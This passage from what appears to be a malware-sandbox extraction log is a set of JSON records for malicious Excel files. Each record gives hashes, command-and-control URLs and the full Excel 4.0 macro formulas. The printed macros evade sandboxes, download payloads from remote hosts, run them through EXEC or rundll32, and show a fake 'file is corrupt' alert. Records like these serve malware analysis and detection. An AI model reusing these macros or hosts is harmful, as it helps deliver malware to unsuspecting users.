corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"y5dtu4ZrkX\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"075ed5ecbdce4f773ee7f0add978c981195806fc73eb2d4799ed3b89b911dabc"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"075ed5ecbdce4f773ee7f0add978c981195806fc73eb2d4799ed3b89b911dabc","filesize":113664,"md5":"51e8d43b299469a411a092ffc1ae6b33","sha1":"5ac683e8dc2ab5f6f1e1b057d62c67f0f9a8ae0d","sha256":"075ed5ecbdce4f773ee7f0add978c981195806fc73eb2d4799ed3b89b911dabc","sha512":"1698a705da14b7139abf490c5c099cd5b130d877e3f08c94ad086ef916b9ec1cc1021da0e32f82180369e69c61ef9b310d5e7af6863b6e8ac83a98a4169cb132","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"075ed5ecbdce4f773ee7f0add978c981195806fc73eb2d4799ed3b89b911dabc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"mcLppGuKxc\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0777630b605a79f5a5a32c13ef1502b99f2f619c1842741fe1a41de485c3bdb0"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"0777630b605a79f5a5a32c13ef1502b99f2f619c1842741fe1a41de485c3bdb0","filesize":113664,"md5":"7bf85e7bc9646734711966a99335bbbf","sha1":"f509a4908fe54c1e4e5aae1f81b8eec2d0e879cd","sha256":"0777630b605a79f5a5a32c13ef1502b99f2f619c1842741fe1a41de485c3bdb0","sha512":"32c0702c2fc91a65af32cb71930b8251bac9a8d726bd19eb46f8d2e34fcc8c9aa5367f74f7d2fc9dacb562548638df9d507ac28213c4471938a3bb31d3b7f3b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0777630b605a79f5a5a32c13ef1502b99f2f619c1842741fe1a41de485c3bdb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LwUgt3kVk2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"077ba0f7c5b27a991e5f6f158f7a9688526db015eb0319b2c4bcb2ea444ad9ce"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"077ba0f7c5b27a991e5f6f158f7a9688526db015eb0319b2c4bcb2ea444ad9ce","filesize":167936,"md5":"adeec072eaea351284932ec388679241","sha1":"33df278bc3dd8c8f4d0e8a3bd929b43815ec9486","sha256":"077ba0f7c5b27a991e5f6f158f7a9688526db015eb0319b2c4bcb2ea444ad9ce","sha512":"6e364fe6d5b4a1a2b1566d00447281cef83068f16e9a0943353eeb82a0785cb922c12dff8aae660fd5246d7058b834d9dfdb8224c8f38bc1b105420164d2d048","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"077ba0f7c5b27a991e5f6f158f7a9688526db015eb0319b2c4bcb2ea444ad9ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H2YxDYeZQ4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c","filesize":212992,"md5":"086bcae55e6d4b57a4623e0b55d755c4","sha1":"e480ba8e1725f1e00769b4a5f8bfd7da09799d6f","sha256":"078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c","sha512":"e4491c5f898dc960dc40f0b7e0e57cb7ad492b8b9a0ef248cf7dc0bd6f4b9c788f4764a03526ae63999ee9f6b732552219a4cfa01f0281462b44526901530a3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eiAbQ7mGrr\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea","filesize":226304,"md5":"2b471d59f039cd4c7789e2fc92fd94a0","sha1":"3ea0ed7848eada9fb2fc11eee7d224cc45824bd3","sha256":"07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea","sha512":"61c57c0a175cf993909b9285b8723923026d0e2068be81c7ed5efe58e83503413b680ebdbffba243dcb57a386aa23749d0fa2b833047dd6df7ffcb8d039954a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uloa7Nu85w\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07b80db2f783cf60290b6966dd86e3b8deb0f47eae296163ba70c6e2b42d4dd5"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07b80db2f783cf60290b6966dd86e3b8deb0f47eae296163ba70c6e2b42d4dd5","filesize":185344,"md5":"5c03570aeb1b9a12c23075a9f58f123e","sha1":"479ee2dff413fab64b0cb7eaf05abfb150fb726d","sha256":"07b80db2f783cf60290b6966dd86e3b8deb0f47eae296163ba70c6e2b42d4dd5","sha512":"5ade19ecb9676bbb2799b136e1d90bb3d82d179c9a38fa0bc15b294c98c2302648b3f05e2557ef5bdd74239aef00846b34ce42eff540cce4c2dac77be15bbae0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07b80db2f783cf60290b6966dd86e3b8deb0f47eae296163ba70c6e2b42d4dd5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07c0fb847b4d67de0093ae6039fa89502ab45029f428b101be201b16e8c2189e"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07c0fb847b4d67de0093ae6039fa89502ab45029f428b101be201b16e8c2189e","filesize":170496,"md5":"4a41c527328c1feb607fd8f723f5f406","sha1":"775ec0b917f61754d1affcedb73ac2bdb72128ed","sha256":"07c0fb847b4d67de0093ae6039fa89502ab45029f428b101be201b16e8c2189e","sha512":"b45c6502d915cbc400218b7be74decdb6a8baaf8323b6280d4995defb19a5a248766b08428746d9bf8fa8be2fbbf2192c2bab86751e07491d79dfb6f060164f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07c0fb847b4d67de0093ae6039fa89502ab45029f428b101be201b16e8c2189e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ES2K2ZXDr9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07cff047aa6183922cb9d8c559f0d6a67b4ca32967551c73176e140ebc69ab12"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07cff047aa6183922cb9d8c559f0d6a67b4ca32967551c73176e140ebc69ab12","filesize":206336,"md5":"b64da1728db97b32841166bbb1d9ce29","sha1":"306957088a6b0a064705a57a3ec8d7698514edb7","sha256":"07cff047aa6183922cb9d8c559f0d6a67b4ca32967551c73176e140ebc69ab12","sha512":"6c8dd2e7079b5fdff3f06e52eecbf95c7ce3752c4ecc247d922ec167414c9bf6f77ec222c4a1be0ea0a2f505caec3b02ec1df8ab56f6a906e1dfcd059544bf9b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07cff047aa6183922cb9d8c559f0d6a67b4ca32967551c73176e140ebc69ab12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8PqGxnq95L\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07e256bb14ed7eec74e0a995343a7eff27cecea7765bf8f3ddeec3d257eba828"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07e256bb14ed7eec74e0a995343a7eff27cecea7765bf8f3ddeec3d257eba828","filesize":167936,"md5":"ae2861d17e4a7576b7dd75bb14b1e9bd","sha1":"7cccc395451d9e370e204695ceee773a132d614f","sha256":"07e256bb14ed7eec74e0a995343a7eff27cecea7765bf8f3ddeec3d257eba828","sha512":"9258862f58ee26ac398f55ecb60f1abf06e89ed5b2b66d87432544c0110c203dd7fb86a7288ff9204e3f9ca22e15b265fe5b4d38c4a1b312748fb7586f60d38e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07e256bb14ed7eec74e0a995343a7eff27cecea7765bf8f3ddeec3d257eba828.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b1Tbu9LhI2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07e4fa4cb984d53ec11d4ab57039f78711ce022f4b4ea8a67d878b2671f44cb7"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07e4fa4cb984d53ec11d4ab57039f78711ce022f4b4ea8a67d878b2671f44cb7","filesize":116224,"md5":"4029dc9fade1e9f5aa34072b7a981a0c","sha1":"ae324c9833523c682cc729745ec6f83b4d1e9ed5","sha256":"07e4fa4cb984d53ec11d4ab57039f78711ce022f4b4ea8a67d878b2671f44cb7","sha512":"9457972c2019b1ab22c3fcd99404e92ca3a01de240c776a5aca6e22989e3bf270176bd05a2a2700e343d659a5bbb35108f8f0d6c9f86f101048fdc8cc6c9175c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07e4fa4cb984d53ec11d4ab57039f78711ce022f4b4ea8a67d878b2671f44cb7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NWUSXv6FMn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5","filesize":212992,"md5":"14be01eee831846d7b757b62d9a26b49","sha1":"3623c1858e5462e553c318bb5589634799b1203f","sha256":"07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5","sha512":"7519e21abcd0b56b44d71f81851ccb6577ce2f993409e639f7271ae46b9c234c819ccef556e3fef3e8d8402ad5eb608a6f018eefadb6da431bcbeed0b2d400a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rQWtLvQjQM\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07ef3ee219abd103fb872414f05d754d85af8d51ca6716f810273837dbe3f922"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07ef3ee219abd103fb872414f05d754d85af8d51ca6716f810273837dbe3f922","filesize":185344,"md5":"0300fdcd33faf75246bb648b54885037","sha1":"900aa3f1114c98d09b384fa90c8edfb1c3e50fd0","sha256":"07ef3ee219abd103fb872414f05d754d85af8d51ca6716f810273837dbe3f922","sha512":"3145bf49914f16b54521bb9aa1e81475faa7326958a148bc095d70b732e314fa8aaed4f0d44169f59dedbf014f648285a3077bbc0765bd7199aa412545e2b022","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07ef3ee219abd103fb872414f05d754d85af8d51ca6716f810273837dbe3f922.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07efcbb1679b332dc030013e02fd44db1c5ce58b22788b5be247982eb994588f"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07efcbb1679b332dc030013e02fd44db1c5ce58b22788b5be247982eb994588f","filesize":214528,"md5":"5645c73b64f281444b63cee060455708","sha1":"233ee87e0841cfbddcf99f1c69414d6b00eb99af","sha256":"07efcbb1679b332dc030013e02fd44db1c5ce58b22788b5be247982eb994588f","sha512":"617635f7ece5f6cfdcfe2c1a06e7182eff826e7fb6f8277f2240451586e3f6340fb62cf099dd0f09712234d5c5d6bedb2937b9eb6c61e22b487158a57c3a26cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07efcbb1679b332dc030013e02fd44db1c5ce58b22788b5be247982eb994588f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"03m3JgDf5d\",TRUE)\nGOTO(R$0C$18)"}}}]}
